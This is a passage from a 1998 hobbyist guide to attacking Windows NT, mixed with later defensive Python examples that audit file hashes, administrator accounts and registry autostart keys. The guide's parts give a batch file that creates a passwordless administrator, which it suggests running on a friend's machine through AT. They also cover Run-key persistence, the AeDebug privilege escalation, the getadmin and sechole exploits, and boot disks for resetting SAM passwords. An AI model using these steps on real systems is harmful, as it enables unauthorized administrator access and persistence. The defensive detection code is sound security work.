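The renaming trick (nc.exe becomes winlog.exe) defeats anyone who checks the TaskList or the system32 directory by name, which is exactly why a defender should not rely on names. The following is an added example, not code from the guide or from the netcat project: it baselines a directory by content hash and then diffs a later snapshot against it, so a file that has merely been renamed is reported as the same bytes under a new name, and a known-bad hash is flagged whatever the file is called. The directory, the files in it and the "known-bad" list are all constructed in a temporary directory so the example runs anywhere; on a real machine you would baseline c:\winnt\system32 right after installation and keep the baseline somewhere the machine cannot write to.

```python
"""Content-hash baseline of a directory, so renamed tools still show up.
Added example; the files and the known-bad list are constructed in a temp dir."""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple


def sha256_file(path: str, chunk: int = 65536) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(directory: str) -> Dict[str, str]:
    """Map path (relative to `directory`) -> SHA-256 for every file under it."""
    out = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            out[os.path.relpath(full, directory)] = sha256_file(full)
    return out


def compare(baseline: Dict[str, str], current: Dict[str, str], known_bad=None):
    """Diff two snapshots. Returns (added, changed, renamed, flagged):
    added   - paths present now but not in the baseline
    changed - baselined paths whose content differs
    renamed - added paths whose content equals some baselined file
    flagged - paths whose hash is on the known-bad list, whatever their name"""
    known_bad = known_bad or {}
    by_hash = {h: p for p, h in baseline.items()}
    added = sorted(p for p in current if p not in baseline)
    changed = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    renamed = sorted((p, by_hash[current[p]]) for p in added if current[p] in by_hash)
    flagged = sorted((p, known_bad[current[p]]) for p in current if current[p] in known_bad)
    return added, changed, renamed, flagged


def _write(directory: str, name: str, data: bytes) -> None:
    with open(os.path.join(directory, name), "wb") as f:
        f.write(data)


def demo() -> Tuple[List[str], List[str], List[Tuple[str, str]], List[Tuple[str, str]]]:
    """Constructed stand-in for c:\\winnt\\system32: baseline it, then rename a
    baselined tool to an innocuous name and drop a batch file beside it."""
    with tempfile.TemporaryDirectory() as d:
        _write(d, "cmd.exe", b"placeholder bytes standing in for cmd.exe")
        _write(d, "nc.exe", b"placeholder bytes standing in for nc.exe")
        baseline = snapshot(d)

        os.rename(os.path.join(d, "nc.exe"), os.path.join(d, "winlog.exe"))
        _write(d, "runnc.bat", b"@echo off\r\nrem constructed placeholder\r\n")
        # A known-bad list is keyed by hash; here it is built from the placeholder bytes.
        known_bad = {sha256_file(os.path.join(d, "winlog.exe")): "netcat (constructed hash)"}

        return compare(baseline, snapshot(d), known_bad)


if __name__ == "__main__":
    added, changed, renamed, flagged = demo()
    print("added:", added)
    print("changed:", changed)
    print("renamed:", renamed)
    print("flagged:", flagged)
```

The interesting output is the "renamed" list: winlog.exe is reported as nc.exe under a new name, which is the case the TaskList check misses. The same diff catches the other hiding place the text goes on to describe, a batch file dropped into a directory on the PATH, because it is simply a new file.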
To see if your Schedule service is running, you can either click Control Panel -> Services, and check it, or if you have Perl installed (see above), you can run the following script to see if the service is running, and if not, start it:

----- begin script -----
# atchk.plx
# Script checks to see if AT service is running on local
# machine...if not, starts it. Minor modifications will
# allow you to do the same thing on a remote machine, once
# you have successfully completed the IPC$ connection and have
# Administrator rights.
#
# usage: perl atchk.plx

use Win32::Service;
use Win32;

my %status;
# an empty host name means the local machine; CurrentState 4 is SERVICE_RUNNING
Win32::Service::GetStatus('', 'Schedule', \%status);
die "service is already started\n" if ($status{CurrentState} == 4);
Win32::Service::StartService(Win32::NodeName(), 'Schedule') || die "Can't start service\n";
print "Service started\n";

#**Note: This script was modified from:
#http://www.inforoute.cgs.fr/leberre1/perlser.htm
----- end script -----

Note: Only Administrators or members of the Administrators group can run the AT command.

Once installed, the 'runnc.bat' file can be executed via the AT command. The necessary syntax for the AT command is:

AT [\\computername] [time] "command"

or more particularly:

AT [\\computername] [time] runnc.bat

References to commands can be hidden in various places within the registry, set to run when a user logs in:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Note: This last key is where you will find things like AOL's Instant Messenger. The install puts the reference to the app there, but you won't find it in your StartUp box...

Here's another little exercise that you should run on your own machine first, and then try copying it over to a friend's machine and running it via the AT command.
The batch file below uses commands that are native to NT to create a new user account, then make that user a member of the Administrator group:

----- begin batch file -----
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
net localgroup "Users" /del Admin
----- end batch file -----

What are some other neat little tricks to try? Get Netbus from http://netbus.hypermart.net/ . This little program is similar to Back Orifice, and it runs on NT. (Visit the makers of Back Orifice at http://www.cultdeadcow.com/)

Okay, so you and your 'leet buddies have played around with each other's machines via the Internet, and pretty much walked through the exercises listed above. Now, what are some local 'attacks' that you can run against your own machine?

[Local Attacks]

Let's say you have a couple of accounts on your NT box, at least one with Admin rights, and one or two others with user rights. You've already run through the password cracking exercise and seen how easy it is to get the 'SAM._' file and crack it. So what else can you do? Well, you can try the 'getadmin' exploit. This exploit consists of a program and .dll file that will add the user to the Administrator group. Get the necessary files from: http://www.nmrc.org/files/nt/index.html

The Microsoft site has a hotfix for the "getadmin" exploit, located at: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/getadmin-fix/

General information on security problems addressed by Microsoft can be found at: http://www.microsoft.com/security/issues.htm

For more information on the 'getadmin' exploit, go to: http://www.ntsecurity.net and search for 'getadmin'.

All you need to do to test this exploit is log onto your system via a user account, copy the files into a directory, and run getadmin.exe.

Another local exploit similar to the "getadmin" exploit has popped up.
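The batch file and the getadmin exploit leave the same footprint: a member of the local Administrators group that nobody approved, and in the batch file's case an account created with no password required and no expiry. Both are visible in the output of the very same "net" command the batch file uses. The following is an added example, not code from the guide: parsers for "net localgroup Administrators" and "net user <name>" output, run over constructed samples (the column layout is an approximation of the NT 4 output, the account names are invented, and the approved-administrator list is an assumption), with an audit that reports unexpected administrators and accounts flagged "Password required: No".

```python
"""Audit local Administrators membership and account settings from "net"
command output. Added example; the samples are constructed, not real captures."""
import re
from typing import Dict, List, Tuple

SAMPLE_LOCALGROUP = """\
Alias name     Administrators
Comment        Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Admin
The command completed successfully.
"""

SAMPLE_NET_USER = """\
User name                    Admin
Full Name
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/1/98 10:15 AM
Password expires             Never
Password changeable          7/1/98 10:15 AM
Password required            No
User may change password     Yes
The command completed successfully.
"""

APPROVED_ADMINS = {"Administrator"}   # assumed approved list (example only)


def parse_localgroup(text: str) -> List[str]:
    """Members are the non-blank lines between the dashed rule and the
    closing status line."""
    members, in_members = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_members = True
            continue
        if not in_members:
            continue
        if line.startswith("The command completed"):
            break
        if line.strip():
            members.append(line.strip())
    return members


def parse_net_user(text: str) -> Dict[str, str]:
    """Turn the two-column "net user" listing into {field: value}. Fields
    with no value (an empty Full Name, say) are simply absent."""
    info = {}
    for line in text.splitlines():
        m = re.match(r"^(\S.*?)\s{2,}(\S.*)$", line)
        if m:
            info[m.group(1)] = m.group(2).strip()
    return info


def audit_accounts(localgroup_text: str, net_user_texts: List[str],
                   approved=APPROVED_ADMINS) -> List[Tuple[str, str]]:
    findings = []
    for member in parse_localgroup(localgroup_text):
        if member not in approved:
            findings.append(("unexpected_admin", member))
    for text in net_user_texts:
        info = parse_net_user(text)
        name = info.get("User name", "?")
        if info.get("Password required", "").lower() == "no":
            findings.append(("no_password_required", name))
        if info.get("Account expires", "").lower() == "never" and name not in approved:
            findings.append(("never_expires", name))
    return findings


if __name__ == "__main__":
    for f in audit_accounts(SAMPLE_LOCALGROUP, [SAMPLE_NET_USER]):
        print(f)
```

Run the two "net" commands on a schedule (the AT service the text describes is as useful to the defender as to the attacker), diff against the previous run, and a new administrator shows up within the hour rather than when someone happens to open User Manager.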
The exploit works like this: the user runs a program called "sechole.exe" and the final result (possibly after a reboot) is that the user now has administrator rights! For more information on this and the zipped archive "sechole.zip", go to: http://www.technotronic.com/microsoft.html

A variation on this exploit involves the Registry setting that determines what the default debugger (the program run when a user mode program crashes) is. Usually, the setting is:

Hive:          HKEY_LOCAL_MACHINE
Key:           \Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Value:         Debugger
Data Type:     REG_SZ
Default Value: drwtsn32 -p %ld -e %ld -g

The "Everyone" group has the ability to set the value of this key, and that is essentially how you can exploit it. The debugger runs in the security context of the crashed application, so all you need to do is change the Default Value (via 'regedit') to point to the User Manager, and then crash one of the services that are running. Then you can add accounts to the User Manager...even to the Administrator group.

*******************************************************************
NEWBIE NOTE: Before any changes are made to the Registry, make sure that you make a backup of your current Registry using the "rdisk /s" utility. You can make changes to the Registry by clicking Start -> Run, and entering either 'regedit' or 'regedt32'. Before you attempt any of this, read the files pertaining to the Registry from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/) and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).
*******************************************************************

Another local exploit that you can attempt uses the NTFSDOS utility, which is nothing more than a bootable DOS diskette that can read (but not write to) NTFS partitions. This would potentially allow an attacker to make off with copies of system files, to include the SAM database.
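The AeDebug value and the three Run keys listed earlier in this part are all plain registry strings, so the cheapest way to watch them is to export them with regedit and check the export. The following is an added example, not code from the guide: a parser for the REGEDIT4 text format that regedit on NT 4 writes, plus an audit that reports a Debugger value other than the default quoted above and any Run/RunServices entry that is resolved through the PATH or points outside the directories you trust. The export is constructed (every value in it is invented, including the tampered debugger path), and the "trusted directories" list is an assumption for the example.

```python
"""Parse a REGEDIT4 export and audit the AeDebug and Run keys. Added
example; the export below is constructed and the trusted-directory list
is an assumption."""
import re
from typing import Dict, List, Tuple

SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug]
"Auto"="1"
"Debugger"="C:\\TEMP\\notadebugger.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"winlog"="C:\\TEMP\\runnc.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"AIM"="C:\\Program Files\\AIM\\aim.exe"
"""

AEDEBUG_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug"
DEFAULT_DEBUGGER = "drwtsn32 -p %ld -e %ld -g"   # the default quoted in the text
RUN_KEYS = [
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
]
TRUSTED_DIRS = ("c:\\winnt\\", "c:\\program files\\")   # assumed for the example

SECTION = re.compile(r"^\[(.+)\]\s*$")
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s: str) -> str:
    # .reg files escape backslash and double quote with a backslash
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a REGEDIT4 export into {key path (lower-cased): {value name: data}}.
    String data is unescaped; dword:/hex: data is kept verbatim."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        m = SECTION.match(line)
        if m:
            current = m.group(1).lower()
            keys.setdefault(current, {})
            continue
        m = VALUE.match(line)
        if m and current is not None:
            name, raw = _unescape(m.group(1)), m.group(2)
            if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
                keys[current][name] = _unescape(raw[1:-1])
            else:
                keys[current][name] = raw
    return keys


def audit_autostart(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, ...]]:
    findings: List[Tuple[str, ...]] = []
    debugger = keys.get(AEDEBUG_KEY.lower(), {}).get("Debugger")
    if debugger is not None and debugger.lower() != DEFAULT_DEBUGGER:
        findings.append(("aedebug_changed", debugger))
    for key in RUN_KEYS:
        hive = "HKLM" if key.startswith("HKEY_LOCAL_MACHINE") else "HKCU"
        tail = key.rsplit("\\", 1)[-1]
        for name, cmd in keys.get(key.lower(), {}).items():
            low = cmd.lower()
            if not low.startswith(("c:\\", "\\\\")):
                # bare program name: found via the PATH, so whatever sits first in a PATH directory wins
                findings.append(("autostart_path_relative", f"{hive}\\{tail}/{name}", cmd))
            elif not low.startswith(TRUSTED_DIRS) or low.endswith(".bat"):
                findings.append(("autostart_outside_trusted", f"{hive}\\{tail}/{name}", cmd))
    return findings


if __name__ == "__main__":
    for f in audit_autostart(parse_reg(SAMPLE_REG)):
        print(f)
```

A changed Debugger value is the finding to act on first, and the underlying fix is the permission the text points at: in regedt32, the AeDebug key should not grant Everyone "Set Value". PATH-relative entries such as SysTray.Exe are normal on a stock system, so that class of finding is something to baseline once and then watch for changes, not something to clear.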
The folks at Systems Internals (http://www.sysinternals.com) have not only an NTFSDOS utility available, but also some tools that give the user limited write capability. SysInternals also has NTRecover and NTLocksmith, along with a variety of other useful tools. Get a copy of the utility, and try booting your own system with the diskette in the A:\ drive.

There is a nifty little utility available, one that is essentially a Linux boot disk: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

The utility comes with rawrite.exe, so that DOS and Windows users can download the utility and create the Linux boot disk. The utility is an NTFS-bootable minimal kernel, with a small program that allows the user to change any password in the SAM database. Alternatively, you can find the Linux binary file (without the rawrite.exe utility) at: http://www.nmrc.org/files/snt/index.html called bootdisk.bin, and according to the description, this is the file you are interested in. You will still need to get a copy of rawrite.exe, in order to write the information to a diskette in a usable form. Carefully read the instructions on the web page for the utility (listed above) and if you are feeling especially '31337', try it out against your own system.

[Final Words]

By now you should be familiar with some of the methods used to attack and compromise an NT system. Hopefully, you have seen fit to try out the exercises on your own system, or against a friend's system (with permission, of course). And it should start becoming clear what it takes to secure a system from attack. The first step is to become familiar with various exploits by regularly visiting such sites as RootShell (http://www.rootshell.com), the ISS X-Force site (http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net), and NTBugTraq (http://www.ntbugtraq.com).
Then go to the Microsoft Support (http://support.microsoft.com) and Security (http://www.microsoft.com/security) sites to see what the 'official' fixes are...the NTBugTraq site does a great job of keeping track of the latest hotfixes, and which ones are obsolete. The Microsoft Support site is especially useful, because you can search for information or specific KnowledgeBase articles, and print out those that you find useful. The "Hardening NT" document from Santeria Systems (http://pw2.netcom.com/~honeyluv/index.html) provides an excellent guide for protecting your system, complete with references to the appropriate KnowledgeBase article for each step.

Finally, Microsoft maintains a list of security bulletins at: http://www.microsoft.com/security

_______________________________________________________________________
Copyright 1998 keydet89. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
_________________________________________________________